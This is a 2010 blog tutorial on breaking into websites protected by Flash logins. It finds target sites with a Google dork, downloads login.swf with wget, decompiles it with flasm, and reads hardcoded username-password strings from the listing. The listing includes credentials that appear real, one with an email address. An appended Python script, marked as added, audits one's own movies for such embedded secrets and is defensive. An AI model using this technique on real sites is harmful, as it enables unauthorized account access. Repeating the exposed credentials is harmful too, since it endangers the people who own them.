Oct 20, 2010

Decompiling Flash Logins

This tutorial will show you how to bypass unsecured Flash logins. It is a pretty simple task. First, search Google for some Flash logins; I like to use either login.swf or inurl:login.swf. Once you have found a site you would like to bypass, simply change the link at the top from login.html to login.swf. You will see that it has zoomed in on the login table. All you need to do now is download login.swf by opening a shell and typing:

wget http://whatever.com/login.swf
You will now see that it has downloaded the Flash login to your root shell. It is now time to decompile the login, which you can do by typing:
flasm -d login.swf
The output will look a bit like the listing below.
    movie 'login.swf' // flash 5, total frames: 3, frame rate: 10 fps, 170×109 px
    protect
    defineButton 20
    on overUpToOverDown
    push 'V'
    push '0'
    push '1'
    push 'String'
    new
    setVariable
    push 'z'
    push ''
    push '1'
    push 'String'
    new
    setVariable
    push 'z'
    push 'userBox'
    getVariable
    push 'passBox'
    getVariable
    concat
    setVariable
    push 'z'
    getVariable
    push 'Kaj20code20fm'
    stringEq
    not
    branchIfTrue label1
    push 'V'
    push '1'
    setVariable
    getURL 'http://www.example.com/frontpage.html' '_self'
    label1:
    push 'z'
    getVariable
    push 'Overkaj12345'
    stringEq
    not
    branchIfTrue label2
    push 'V'
    push '1'
    setVariable
    getURL 'http://www.example.com/frontpage.html' '_self'
    label2:
    push 'z'
    getVariable
    push 'tte@fujitsu.dk20code20fm'
    stringEq
    not
    branchIfTrue label3
    push 'V'
    push '1'
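As you can see from looking at the code, it says push 'Overkaj12345'. The movie concatenates the contents of userBox and passBox into z and compares z against this string, so the string is the username followed directly by the password. You will need to split it into two parts: Username: Overkaj, Password: 12345.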
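A check a site owner can run over the flasm -d output of their own movie before publishing, given here as an added example that is not part of the original post: it flags every string constant compared with stringEq, the pattern shown in the listing above, and leaves comparisons against variables alone. The sample listing and the names audit and SAMPLE are constructed for illustration, and the check assumes one quoted literal per push, as in the listing above.

```python
import re

PUSH_LITERAL = re.compile(r"^push\s+'([^']*)'$")
GET_URL = re.compile(r"^getURL\s+'([^']*)'")
# Constructed sample in the style of `flasm -d` output; not from a real site.
SAMPLE = """\
push 'z'
push 'userBox'
getVariable
push 'passBox'
getVariable
concat
setVariable
push 'z'
getVariable
push 'demoUserdemoPass'
stringEq
not
branchIfTrue label1
getURL 'http://www.example.com/members.html' '_self'
label1:
push 'z'
getVariable
push 'serverToken'
getVariable
stringEq
"""

def audit(disasm):
    """Flag string constants compared with stringEq inside the movie."""
    ops = [(n, s.strip()) for n, s in enumerate(disasm.splitlines(), 1) if s.strip()]
    findings = []
    for i in range(1, len(ops)):
        lit = PUSH_LITERAL.match(ops[i - 1][1])
        if ops[i][1] != "stringEq" or not lit:
            continue  # not a comparison, or compared against a variable
        url = None
        for _, later in ops[i + 1:]:
            if later.endswith(":"):  # next label: end of the success branch
                break
            if hit := GET_URL.match(later):
                url = hit.group(1)  # destination the movie itself reveals
                break
        findings.append({"line": ops[i - 1][0], "literal": lit.group(1), "url": url})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"line {f['line']}: embedded secret {f['literal']!r} gates {f['url']}")
```

Any finding means the comparison value ships to every visitor inside the .swf, so the check belongs on the server instead.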

2 comments:

Anonymous said...

Nice one thanks :)

Anonymous said...

fe

FlashcRew Blog